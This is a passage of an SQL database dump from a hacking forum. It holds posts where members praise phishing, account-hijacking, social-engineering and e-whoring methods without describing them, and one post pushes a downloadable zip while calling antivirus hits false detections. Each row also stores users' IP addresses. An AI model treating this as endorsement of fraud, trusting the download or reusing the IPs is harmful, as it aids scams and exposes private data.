[url=http://l33thacking.net/contact.php]contact form[/url]\r\n\r\n[b]Rules[/b]\r\n\r\n- All links must be of online streaming, no downloads.\r\n- You must provide at least 4 links, a banner and movie description.\r\n- If 50% or more links are dead then the thread will be junked\r\n- By posting you agree that all the links you shared are found online and are NOT private and uploaded only for L33THacking.\r\n- No off site linking. Which means any outgoing link must be of streams and not of sites with the links.\r\n- It\'s OK if you do not provide credits to the uploader.\r\n- Off site links to pastebin are allowed. WE DO NOT ALLOW STREAMING ON PASTEBIN.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '266ecab14b77492becb16d554dad5601', '0', '0'); INSERT INTO mybb_posts VALUES('2616', '514', '2551', '9', 'RE: How to make serious money', '0', '9', 'p420', '1348679861', 'Nice method but when I click on buy now on the website, it opens the outlook mail program on my PC.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c216e6c52983d367190a8b6bd43512c2', '0', '0'); INSERT INTO mybb_posts VALUES('2617', '522', '2607', '16', 'RE: [Free][EBook] How to SE Starbucks', '0', '9', 'p420', '1348679993', 'Starbucks are easy, but thanks for the contribution.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '550f9888fd0bb7b0e7e4f6d835c16964', '0', '0'); INSERT INTO mybb_posts VALUES('2618', '524', '0', '63', 'Need signature', '0', '9', 'p420', '1348680037', 'I need a signature saying p420 please.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f734d4930312b2516a2e8e6439d67385', '0', '0'); INSERT INTO mybb_posts VALUES('2619', '516', '2608', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '5', 'Timmy', '1348680124', '[quote=\'iTzIpod\' pid=\'2608\' dateline=\'1348618476\']\r\nI don\'t need to use this method, I don\'t own a Xbox. Not planning on getting one too.\r\n\r\nGood luck everyone going to try this.\r\n[/quote]\r\n\r\nYou can use it to hack hotmail accounts too.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '227e43dacff9d24f9a09cf0361bf5696', '0', '0'); INSERT INTO mybb_posts VALUES('2620', '464', '2192', '12', 'RE: [TUT] FUD USB Stealer by Anonymous Hackers', '0', '5', 'Timmy', '1348680507', 'Nice forensics tool. Thanks 4 the pictures.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a79ab377f4b9fa3d98019bdb87440311', '0', '0'); INSERT INTO mybb_posts VALUES('2621', '525', '0', '30', 'Huge Dump of Ebooks', '0', '5', 'Timmy', '1348680913', '[img]http://puu.sh/13cAj.png[/img]\r\n\r\n[b]Download[/b]\r\nhttps://dl.dropbox.com/u/57903257/e-Books.zip\r\n\r\nVirus Scan not needed because this contains multiple files but here\'s a scan of the zip.\r\n\r\nhttps://www.virustotal.com/file/190085e20c6ccad6a9c98401be5295aa1ba7613dce2b613735ec9bb685fd88fa/analysis/1348680806/\r\n\r\nFalse Detection!!!!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7a07a2ff7d49f7cb74e7a5ec26dcce34', '0', '0'); INSERT INTO mybb_posts VALUES('2622', '524', '2618', '63', 'RE: Need signature', '0', '62', 'R?????zo?', '1348687065', 'Since you are unique, please post here:\nhttp://l33thacking.net/thread-431-page-4.html\n\nI will be glad to help you :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '49027bb61405230d9ebb908167de6fb3', '0', '0'); INSERT INTO mybb_posts VALUES('2623', '522', '2607', '16', 'RE: [Free][EBook] How to SE Starbucks', '0', '82', 'iTzIpod', '1348687140', 'No problem bro. Thanks for viewing my thread ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd4e6b02e97a04e09675d7206ad785a68', '0', '0'); INSERT INTO mybb_posts VALUES('2624', '431', '2594', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348687163', '[quote=\'iTzIpod\' pid=\'2594\' dateline=\'1348616976\']\r\nNice signature NXK ;) \r\n\r\nStill waiting for the Unique Userbars. Take your time like I said. Don\'t need to rush it.\r\n[/quote]\r\n\r\nMy 2nd attemp:\r\n\r\n[img]http://i.imgur.com/ceRsZ.gif[/img]\r\n\r\nSorry I know I said I would make a few. bit busy though but I will try tomorrow :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'bcd864f01c1c1725a25d29b706182f99', '0', '0'); INSERT INTO mybb_posts VALUES('2637', '526', '0', '3', 'New Smilies', '0', '1', 't3h jok3r', '1348708006', 'I\'m sure you guys noticed that I added a new set of smilies, so what are your guys thoughts? They are less but plan on adding some more.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2f5cdb4b39642d92f51b3be747c80c5', '0', '0'); INSERT INTO mybb_posts VALUES('2638', '526', '2637', '3', 'RE: New Smilies', '0', '194', 'Slender Man', '1348708520', 'I like the new smilies, there kinda cute LOL. ;)', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'd1f1a30688e2ed908886510ecf346799', '0', '0'); INSERT INTO mybb_posts VALUES('2626', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '82', 'iTzIpod', '1348687243', '@Timmy, I have my own method of hacking hotmail accounts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b2b95dfa156acb54f1135442828fd6ca', '0', '0'); INSERT INTO mybb_posts VALUES('2627', '525', '2621', '30', 'RE: Huge Dump of Ebooks', '0', '82', 'iTzIpod', '1348687288', 'Will check this out :D Thanks for the contribution!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3b9b5be847e6a80c783fd7237ea2867b', '0', '0'); INSERT INTO mybb_posts VALUES('2628', '431', '2624', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348687357', '[quote=\'R?????zo?\' pid=\'2624\' dateline=\'1348687163\']\r\n[quote=\'iTzIpod\' pid=\'2594\' dateline=\'1348616976\']\r\nNice signature NXK ;) \r\n\r\nStill waiting for the Unique Userbars. Take your time like I said. Don\'t need to rush it.\r\n[/quote]\r\n\r\nMy 2nd attemp:\r\n\r\n[img]http://i.imgur.com/ceRsZ.gif[/img]\r\n\r\nSorry I know I said I would make a few. bit busy though but I will try tomorrow :)\r\n[/quote]\r\n\r\nThis is actually a good one. I love the font. What is it? I might use this. Unless I see your other userbars.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '20af64ba228208b0ef944cff6fdab33d', '0', '0'); INSERT INTO mybb_posts VALUES('2629', '431', '2628', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348688677', '[quote=\'iTzIpod\' pid=\'2628\' dateline=\'1348687357\']\r\n[quote=\'R?????zo?\' pid=\'2624\' dateline=\'1348687163\']\r\n[quote=\'iTzIpod\' pid=\'2594\' dateline=\'1348616976\']\r\nNice signature NXK ;) \r\n\r\nStill waiting for the Unique Userbars. Take your time like I said. Don\'t need to rush it.\r\n[/quote]\r\n\r\nMy 2nd attemp:\r\n\r\n[img]http://i.imgur.com/ceRsZ.gif[/img]\r\n\r\nSorry I know I said I would make a few. bit busy though but I will try tomorrow :)\r\n[/quote]\r\n\r\nThis is actually a good one. I love the font. What is it? I might use this. Unless I see your other userbars.\r\n[/quote]\r\n\r\nfont is called FoughtKnight, you can download it here.\r\nhttp://www.dafont.com/foughtknight.font\r\n\r\nyou want me to play with a few icons?\r\nis the text colour okay?\r\nif you liked this one I won\'t make others due being short on time.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '028a8f8382e0a9446ffb06e3ea779a65', '0', '0'); INSERT INTO mybb_posts VALUES('2630', '490', '2381', '49', 'RE: Forum Suggestion', '0', '62', 'R?????zo?', '1348689653', 'dont put gaming sections like that.\n\nthink you should add it like\n\nFPS\nMMO\'s\nStrategy\n\netc.\n\nif you will add every game to the list you are fucked :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ccda075ba87d49d2910e5ec8794e0c13', '0', '0'); INSERT INTO mybb_posts VALUES('2631', '488', '2355', '8', 'RE: What are you listening to?', '0', '62', 'R?????zo?', '1348689855', 'http://www.youtube.com/watch?v=ySaWSxpb14g\n\nArtist: Nine Inch Nails \nSong: Meet Your Master (Le Pig Mix)\n\nfucking boss', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0bede1c7a2c2866b3c7b78f31d0ac5c9', '0', '0'); INSERT INTO mybb_posts VALUES('2632', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348690482', 'Font and Font color is ok. Might choose this one. Unless you make something better. Try playing with a few icons.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e3432b79ddb079407accef39dcb8954', '0', '0'); INSERT INTO mybb_posts VALUES('2633', '351', '1651', '46', 'RE: Phishing Tutorial', '0', '2', 'Apathy', '1348690700', 'Nice tutorial I am thinking of trying this out.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '0853fd1cd727ce6b8707e98d0ad0c669', '0', '0'); INSERT INTO mybb_posts VALUES('2634', '490', '2630', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348690914', '[quote=\'R?????zo?\' pid=\'2630\' dateline=\'1348689653\']\r\ndont put gaming sections like that.\r\n\r\nthink you should add it like\r\n\r\nFPS\r\nMMO\'s\r\nStrategy\r\n\r\netc.\r\n\r\nif you will add every game to the list you are fucked :P\r\n[/quote]\r\n\r\nTrue and how about gaming consoles and games?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '22475dc1e57305919532aea64060d2d1', '0', '0'); INSERT INTO mybb_posts VALUES('2635', '490', '2381', '49', 'RE: Forum Suggestion', '0', '62', 'R?????zo?', '1348692042', 'add it like\n\nConsoles (PS3, XBOX, etc)\nMobile and Tablet Gaming (iOS and Android)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '42dd8df9aa9c53b5bb63ea6f60374bfc', '0', '0'); INSERT INTO mybb_posts VALUES('2639', '526', '2637', '3', 'RE: New Smilies', '0', '5', 'Timmy', '1348710103', 'I like the smilies too and can\'t wait for the other 1s.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b9aa4fe6284151905e367cfa33a2542', '0', '0'); INSERT INTO mybb_posts VALUES('2640', '526', '2637', '3', 'RE: New Smilies', '0', '82', 'iTzIpod', '1348710138', 'They\'re alright. Same ones from TP lol.\r\n\r\n\r\n:angel:\n[hr]\nActually, they\'re better than the original. Even though there were less than before. Oh well. I prefer Quality over Quantity. :D\n\nAlthough a troll face and face palm smily would be nice. \n\n\nFace palm\nTroll face\nEpic face', '24.212.197.164', '416597412', '1', '0', '82', '1348710282', '1', 'ebf4b10cf2f6a3ae916bbb47958c1120', '0', '1348710158'); INSERT INTO mybb_posts VALUES('2641', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '5', 'Timmy', '1348710203', 'Dude that\'s beast what does it include?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4de962bc984c6d45f975f2a7d3f3fe7e', '0', '0'); INSERT INTO mybb_posts VALUES('2642', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '5', 'Timmy', '1348711462', 'I try to come on everyday and help LH because i know how important activity is for LH now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '58914d33142fa2648b3e610b43bee616', '0', '0'); INSERT INTO mybb_posts VALUES('2643', '526', '2637', '3', 'RE: New Smilies', '0', '5', 'Timmy', '1348711702', 'Someone just added the roflol and devil icon. Seems cool', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '11f0254351c62b497a734be83cd644b9', '0', '0'); INSERT INTO mybb_posts VALUES('2644', '526', '2637', '3', 'RE: New Smilies', '0', '82', 'iTzIpod', '1348711955', 'Just noticed that. Thanks for pointing it out :D I won\'t really use the evil icon that much though :evil: :P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14ec0741084194d9e0b4dcc219ae1621', '0', '0'); INSERT INTO mybb_posts VALUES('2645', '526', '2637', '3', 'RE: New Smilies', '0', '1', 't3h jok3r', '1348712062', 'Glad that people are liking the new emoticons.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'da9d60dd9e19e9823eda1b2541de736f', '0', '0'); INSERT INTO mybb_posts VALUES('2646', '526', '2637', '3', 'RE: New Smilies', '0', '4', 'Triple H', '1348712234', 'Better than the old ones, less but better looking', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9a0353e847b74d51d83c21353e2b6961', '0', '0'); INSERT INTO mybb_posts VALUES('2647', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '4', 'Triple H', '1348712278', 'Never underestimate a Chinese :)\n\nI still don\'t believe it though.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f3aed514980d9698c4d3059890908f11', '0', '0'); INSERT INTO mybb_posts VALUES('2648', '63', '149', '23', 'RE: [Guide] - Keylogger Information & Removal - [Guide]', '0', '4', 'Triple H', '1348712362', 'Best keylogger removal guide ever very helpful', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6500426210c4a7cdd7f2b4b213ab446b', '0', '0'); INSERT INTO mybb_posts VALUES('2649', '490', '2636', '49', 'RE: Forum Suggestion', '0', '4', 'Triple H', '1348712439', '[quote=\'t3h jok3r\' pid=\'2636\' dateline=\'1348707447\']\r\n[quote=\'R?????zo?\' pid=\'2635\' dateline=\'1348692042\']\r\nadd it like\r\n\r\nConsoles (PS3, XBOX, etc)\r\nMobile and Tablet Gaming (iOS and Android)\r\n[/quote]\r\n\r\nSo sections like PS3, XBOX should be subforums?\r\n[/quote]\r\n\r\nNo i say that you should make forums and not subforums', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '711e5438d0af7893dfb7389f4e0727be', '0', '0'); INSERT INTO mybb_posts VALUES('2650', '494', '2647', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '82', 'iTzIpod', '1348712560', '[quote=\'Triple H\' pid=\'2647\' dateline=\'1348712278\']\r\nNever underestimate a Chinese :)\r\n\r\nI still don\'t believe it though.\r\n[/quote]\r\n\r\nI know right? I don\'t believe it too. But after more research of this, dang. It\'s true. It\'s something you don\'t want to believe, but you kinda have too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79f37dc99d14d097ca7405011c76104f', '0', '0'); INSERT INTO mybb_posts VALUES('2651', '63', '149', '23', 'RE: [Guide] - Keylogger Information & Removal - [Guide]', '0', '82', 'iTzIpod', '1348712613', 'Very nice guide. Very HQ and detailed. Thanks for the contribution.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '78e7bd64b771f1f65dd8cd1f95c011d1', '0', '0'); INSERT INTO mybb_posts VALUES('2652', '527', '0', '47', 'Get my private free ebay items ebook and more', '0', '4', 'Triple H', '1348712689', 'Refer 2 members and and create 1 useful thread then PM me.\n\n[b]How to enter?[/b]\n\nPost below.\n\nGet free ebay items, $200 a day and free porn accounts ebook by winning this contest.\n\n[b]Duration[/b]\n1 month\n\n[b]How many winners[/b]\n\nUnlimited- Everyone who completes the challenge get the ebooks the same day.\n\n[b]Notes[/b]\n- You have to post below then refer and post then PM me when you are done.', '72.231.24.165', '1223104677', '1', '0', '4', '1348795669', '1', 'fc7872ecba885856edfb1cb55ad78a5a', '0', '1348795669'); INSERT INTO mybb_posts VALUES('2653', '528', '0', '7', '[Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348712742', 'Hey L33tHacking,\r\n\r\nWoot. I have just achieved 700 posts :D\r\nI don\'t think that\'s a lot compared to my other accounts on other forums. Other ones, I have like 5k posts -20k posts.\r\n\r\n:p\r\n\r\nAnyways, the point of this thread is basically just a milestone thread. It\'s just to inform everyone that I reached 700 posts.\r\n\r\nThanks LH for everything. \r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '633c2fed9a5d93d9f9b42c8f918a7189', '0', '0'); INSERT INTO mybb_posts VALUES('2654', '510', '2540', '19', 'RE: Rbd\'s Skype Resolver Source', '0', '4', 'Triple H', '1348712776', 'Link is dead and someone remove this?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0030b8e55dea93c84024339bf59771cf', '0', '0'); INSERT INTO mybb_posts VALUES('2655', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '4', 'Triple H', '1348712863', 'And the best spammer award goes to [b]iTzIpod[/b] :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7324eaea2a55a4e0cdbdea546059b9de', '0', '0'); INSERT INTO mybb_posts VALUES('2656', '527', '2652', '47', 'RE: Get my private free ebay items ebook and more', '0', '82', 'iTzIpod', '1348712893', 'How many winners can they be? Just 1? And once you win, can you leak it into other parts of the forum?\n\nEx. Upgraded Section or Unique Section\nEtc?\n\nAlso, the referrers have to be from the contest\'s duration? Not from before? Because I have 12 Referrers and also I created a lot of threads. Some were useful. Some where informational, etc. \n\nBut if not, I\'ll try to referr more members. And create more useful threads.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3a158419b0bb49bba82927376e1b03ac', '0', '0'); INSERT INTO mybb_posts VALUES('2657', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348712958', 'Thanks Triple H, the King of Kings. ;)\n\nI bet you can whoop Sin Cara\'s ass. :p Although, a match like that seems interesting.\n\n\nTriple H vs. Sin Cara?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '621f9cf3164832d5e385ba0bc39e1b06', '0', '0'); INSERT INTO mybb_posts VALUES('2658', '510', '2540', '19', '[Junk]Rbd\'s Skype Resolver Source', '0', '1', 't3h jok3r', '1348712993', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('2659', '502', '2458', '61', 'RE: Ultimate E-Whoring guide', '0', '82', 'iTzIpod', '1348713334', 'Thanks very much for contributing to Unique as promised. Keep it up! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1fd5d635ed8cf3f68499f4b6e13955c6', '0', '0'); INSERT INTO mybb_posts VALUES('2660', '529', '0', '49', '[Suggestion] A or B Section', '0', '82', 'iTzIpod', '1348713831', 'This section is a debate section. It\'s in the Off Topic/Lounge Section of course. It\'s a sub forum. And it contains threads like:\r\n\r\nCoke or Pepsi\r\nBoy or Girl\r\nWeak or Strong\r\nRich or Poor\r\nEtc\r\n\r\n\r\nAnd the threads must contain a poll containing the options. \r\nEtc? This can boost a lot of L33tHacking \'s activity. Because we can make a lot of threads. And a lot of posts this way :D \r\n\r\nApprove?\r\n\r\nDecline?\r\n\r\nDiscuss.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '170207eea998339ba47a17872b9b17f0', '0', '0'); INSERT INTO mybb_posts VALUES('2661', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1348714035', 'Nice idea but we don\'t have enough active members to support the section daily. I believe the off topic section is perfect for such discussions at the moment.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd6fec80fd8f0d359a1f1a228ae279d2e', '0', '0'); INSERT INTO mybb_posts VALUES('2662', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '1', 't3h jok3r', '1348714097', 'Uhh Yippee congratz my pal :)\n\nThanks for posting and keeping LH up.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0f4d9e9a21328b0bf18e8b154dd0efb4', '0', '0'); INSERT INTO mybb_posts VALUES('2663', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348714252', 'Thanks t3h jok3r :D No problem. Least I could do.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aff77c4dc962290cd9b9c37486a6a3de', '0', '0'); INSERT INTO mybb_posts VALUES('2664', '530', '0', '48', 'Link colors', '0', '1', 't3h jok3r', '1348714286', 'Should I change the link colors from green to white?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f1379ec94ff34c944700f61f76e400d0', '0', '0'); INSERT INTO mybb_posts VALUES('2665', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '82', 'iTzIpod', '1348714344', 'Well I just find it more convenient since if we spam threads in the Off Topic Section, that would just seem weird. And if the A or B Section is there, it would be much more convenient. \n\nIt\'s not like all the forum sections are active. But we try to make them active.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c592b2131d7f8a5d6b8cbe1a6ce22694', '0', '0'); INSERT INTO mybb_posts VALUES('2666', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1348714715', 'Well not a bad idea. How about we will add that section when we have a good amount of active posts? Around 10?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b6dbfd3fb48343cc16550cce7f313108', '0', '0'); INSERT INTO mybb_posts VALUES('2667', '531', '0', '4', 'Hello', '0', '199', 'Anonymous™', '1348716475', 'I like to do GFX, Code Java and HTML and Play some PC Games.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '2f826555f398658999130babefb64fa9', '0', '0'); INSERT INTO mybb_posts VALUES('2668', '532', '0', '23', 'Think you have an infection? Click Here.', '0', '199', 'Anonymous™', '1348716819', 'Hello if you\'re reading this you\'re most likely infected or think you\'re infected, My name is Anonymous™ and I will try to assist you the best I can.\r\n\r\nPlease follow these steps below.\r\n\r\n1. Open up Task Manager and locate the infected process(es) and then kill the process from task manager and then delete the file whitch you located, if your not sure what process looks sketchy or not, Screenshot the whole process list and PM the screenshot.\r\n\r\n2. If you\'re not allowed to open up the task manager or simply cannot find the malware process, Open up System Configuration, by typing \"msconfig\" in the search box in the start menu and then press enter or you can open it by typing the same in the Command Prompt (cmd) and then press enter, when the System configuration window appears, go to the Startup Tab and deactivate all the sketchy app\'s from running on startup\'s, and from there you can also locate the malware files and then delete them, or you can go to the location \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" and do the exact same, deleting the shortcut or so, if your not sure what application that is sketchy or not, you can provide us pictures of the \"msconfig >> startup\" tab and the \"startup folder\".\r\n\r\n3. If you cannot delete the malware files in normal mode, try booting up in safe mode and try to delete the files from there, if you know the location of the files tho. By booting up in safe mode, restart you\'re computer and enter the boot menu by pressing the default key \"F8\", and select \"safe mode with cmd/internet\"\r\n\r\n4. If all of the steps above failed, you can try to remove the malware from you\'re system by running a scan with Superantispyware, Download either the Trial edition or the free edition, doesn\'t matter, after the download is complet, install it and then open up the software, run an update to assure the software is up-to date, then run a full scan and see if it detects the malware, if the scan result comes up as blank, go on to step 5.\r\n\r\n5. Other scanners you can try to remove the malware with is, Malwaresbytes, Download the software and install it, then update it to assure it\'s up-to date, and then run a quick scan with it, a full scan is not necessary, the second scanner you can try is ESET Online Scanner, download it and run it, then start a scan with it. The last scanner you could try is the Spybot - Search & Destroy, run it and do a scan with it.\r\n\r\n6. If you still think you\'re infected, please post all of you\'er logs here so we can assist you further.\r\n\r\n--\r\n\r\nFor Remote Administration Tool (RAT) infections\r\n\r\nDownload Comodo\'s Firewall, The firewall allows you to monitor/block outbound connections and inbound connections.\r\n\r\nFor malware infections with keyhooks (keyloggers)\r\n\r\nDownload KeyScrambler, the software will spoof all the entered keys so the when the author gets the logs it will be displayed.. for an example \"1¨\'-.123fwi&#\"\"ed!\"!DQ\" instead of what you actuall typed, letters/numbers/symbols.\r\n\r\nFor Adwares\r\n\r\nMost adwares out there often redirect their slaves via the hosts file, also the malicious codes replaces or modifies the hosts file, you can easily spot this my checking the file yourself, Go to the location C:\\Windows\\System32\\drivers\\etc\\\"Hosts\" and right click the \"Hosts\" file and open it in notepad, copy + paste everything and post it here afterwards.\r\n\r\nFor more difficult infections like Rootkits and Bootkits\r\n\r\nPlease download GMER, Do a scan with it, when it completed with it copy the logs from it and PM me them.\r\n\r\n--\r\n\r\nI Hope this helps, and good luck.\r\n\r\n~Anonymous™.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '6736cbcb1b30356196f87149b0bdf0be', '0', '0'); INSERT INTO mybb_posts VALUES('2669', '533', '0', '23', 'How to Avoid JDB\'s', '0', '199', 'Anonymous™', '1348717325', 'Steps To Avoid Infection:\r\n\r\n1]Update Java.\r\n\r\nUpdate Java to the latest version as most of the vulnerabilities in the previous versions are fixed in the new release.\r\n\r\n\r\n2]Use Recognized Browser.\r\n\r\nUse those Internet Browsers which has Branded Value Like:\r\n1]Mozilla Firefox.\r\n2]Google Chrome.\r\n3]Internet Explorer.\r\n4]Opera.\r\n5]Safari.\r\n\r\n3]Turn-OFF Java:\r\n\r\nI know this can be a disaster since you wont be able to enjoy the internet to full,but to be 100% safe you can use this method.\r\n\r\n4]Don’t Trust Obscure Links.\r\n\r\n5]Use Sandbox To Browse.\r\n\r\n[b]NOTE: NEVER check the ”Always trust content from this publisher” as this can be exploited.[/b]', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '99fa153a2ccc818d961b9db214914627', '0', '0'); INSERT INTO mybb_posts VALUES('2670', '534', '0', '23', 'Manually Removing Viruses Through System Registry', '0', '199', 'Anonymous™', '1348719363', 'ABOUT: Now the steps I am about to show you are for experienced PC users only. This involves removing those un-wanted viruses out of your system registry. Now not all viruses show up inside your Registry, but sometimes they like to hide themselves in there. Hope you all enjoy.\r\n\r\nThe following steps involve viewing and optionally editing the Windows registry. Before you do this, you should make a backup of the Windows Registry, so that you can restore it in case you inadvertently delete something that causes your computer to behave unexpectedly. You can backup the registry, by going into Regedit (described in step 1 below), select \'My computer\', click File->Export, then type a file name, then click save. You can also export various branches (sections) of the registry by selecting the particular root folder of the section you would like to export. This generally makes more sense when you are only editing a specific area (as in the steps below). So for this example you might want to simply export the \'Run\' section (described in step 2).\r\n\r\nWHAT TO DO: \r\n\r\n1. The first thing you are going to want to do, is first get into your System Registry, there are a few ways of doing so, but for sake of being easier do the following. Click Start->Run->type regedit->hit enter \r\n\r\n2. Now once you are inside your system registry you are going to want to navigate to the correct directory. Browse to: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \r\n\r\nBasically what you have navigated to, is where certain programs run on startup and viruses love to store themselves there because they are running as soon as you start up your PC.\r\n\r\n3. Each item in this area represents a file, which can be seen in the data column, the actual file will end in \'.exe\'. For each file, you can do a search on Google to determine what it is. If you find that it is a virus, you should be able to safely delete the item registry so that it is no longer listed in the registry. You should also delete the actual \'.exe\' file from the file system by browsing to it in Windows Explorer, selecting it, hitting the delete key, and confirm by clicking Yes.\r\n\r\n4. Now what you want to do is, Repeat the process above but this time look in: HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \r\n\r\n[size=xx-small]IMPORTANT NOTE: [/size]\r\n\r\nThere are a few things you always want to do before deleting files from your computer like performing a complete back up of all of your files, which you should be doing on a regular basis, anyway, and remembering to back up your registry just in case you need it again later. Knowing how to remove a computer virus by hand is vitally important to owning a healthy and lasting computer.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '9edc797a1309b435f0e2cd779b31f0d8', '0', '0'); INSERT INTO mybb_posts VALUES('2671', '490', '2381', '49', 'RE: Forum Suggestion', '0', '62', 'R?????zo?', '1348729120', 'Personaly I think subforums would be more organized, but you are the boss :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '40a6c094b775676289095a04f0eab7f9', '0', '0'); INSERT INTO mybb_posts VALUES('2672', '531', '2667', '4', 'RE: Hello', '0', '82', 'iTzIpod', '1348745554', 'Welcome to L33tHacking bro. :D You\'re HQ.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a80e6fcea89ae631c2e94a91ac75303f', '0', '0'); INSERT INTO mybb_posts VALUES('2673', '514', '2551', '9', 'RE: How to make serious money', '0', '53', 'sirchamp', '1348746384', 'You can just download the template and send them an email.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'eced35ca682277ba44297df673e28845', '0', '0'); INSERT INTO mybb_posts VALUES('2674', '514', '2616', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1348746820', '[quote=\'p420\' pid=\'2616\' dateline=\'1348679861\']\r\nNice method but when I click on buy now on the website, it opens the outlook mail program on my PC.\r\n[/quote]\r\n\r\nI don\'t know why it does that. I would love to help but I don\'t know.. \r\n\r\nIf possible, try uninstalling the outlook. (If you want) \r\nOr disable it if possible.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '91d1d5c544031c0a3eeec5e42e2743f3', '0', '0'); INSERT INTO mybb_posts VALUES('2675', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '82', 'iTzIpod', '1348746914', 'We can still get that if we have that section don\'t you agree? \n\n\n[Quote=iTzIpod]\nThis can boost a lot of L33tHacking \'s activity. Because we can make a lot of threads. And a lot of posts this way\n[/Quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2aac88c3df9a2cfb57ebcaa9aae335d', '0', '0'); INSERT INTO mybb_posts VALUES('2676', '530', '2664', '48', 'RE: Link colors', '0', '82', 'iTzIpod', '1348746945', 'Well I can\'t imagine what it would look like in white. But lets try it out.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6cf258b543b7e5b9ac2624f94cd12eb4', '0', '0'); INSERT INTO mybb_posts VALUES('2677', '535', '0', '14', 'Proxy list', '0', '199', 'Anonymous™', '1348761020', 